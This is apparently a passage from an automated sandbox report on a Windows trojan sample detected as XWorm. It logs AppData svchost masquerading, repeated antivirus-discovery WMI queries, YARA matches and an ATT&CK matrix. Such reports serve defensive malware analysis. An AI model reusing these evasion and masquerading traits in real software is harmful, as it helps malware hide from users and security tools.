              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Users\user\AppData\Local\svchost.exeQueries volume information: C:\Users\user\AppData\Local\svchost.exe VolumeInformation
              Source: C:\Users\user\AppData\Local\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\svchost.exeQueries volume information: C:\Users\user\AppData\Local\svchost.exe VolumeInformation
              Source: C:\Users\user\AppData\Local\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4327200255.0000000005BC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nder\MsMpeng.exe
              Source: Amcache.hve.26.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
              Source: Amcache.hve.26.drBinary or memory string: msmpeng.exe
              Source: Amcache.hve.26.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
              Source: Amcache.hve.26.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
              Source: SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4327200255.0000000005BC6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4327200255.0000000005B51000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe, 00000000.00000002.4327200255.0000000005BAA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: Amcache.hve.26.drBinary or memory string: MsMpEng.exe
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected XWorm
              Source: Yara matchFile source: 20.2.svchost.exe.19f0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.svchost.exe.19f0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.svchost.exe.391c344.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.svchost.exe.39471b0.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.svchost.exe.39471b0.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.svchost.exe.391c344.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000014.00000002.2656202645.000000000391C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.2656202645.0000000003947000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.2655969773.00000000019F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.2656202645.00000000034A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7752, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected XWorm
              Source: Yara matchFile source: 20.2.svchost.exe.19f0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.svchost.exe.19f0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.svchost.exe.391c344.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.svchost.exe.39471b0.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.svchost.exe.39471b0.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.svchost.exe.391c344.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000014.00000002.2656202645.000000000391C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.2656202645.0000000003947000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.2655969773.00000000019F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.2656202645.00000000034A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7752, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
              Windows Management Instrumentation              		21
              Registry Run Keys / Startup Folder              		11
              Process Injection              		11
              Masquerading              		OS Credential Dumping231
              Security Software Discovery              		Remote Services11
              Archive Collected Data              		1
              Web Service              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              PowerShell              		1
              DLL Side-Loading              		21
              Registry Run Keys / Startup Folder              		11
              Disable or Modify Tools              		LSASS Memory1
              Process Discovery              		Remote Desktop ProtocolData from Removable Media11
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              DLL Side-Loading              		141
              Virtualization/Sandbox Evasion              		Security Account Manager141
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive1
              Non-Standard Port              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
              Process Injection              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture3
              Ingress Tool Transfer              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information              		LSA Secrets1
              File and Directory Discovery              		SSHKeylogging3
              Non-Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
              Obfuscated Files or Information              		Cached Domain Credentials13
              System Information Discovery              		VNCGUI Input Capture4
              Application Layer Protocol              		Data Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
              Software Packing              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Timestomp              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
              DLL Side-Loading              		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
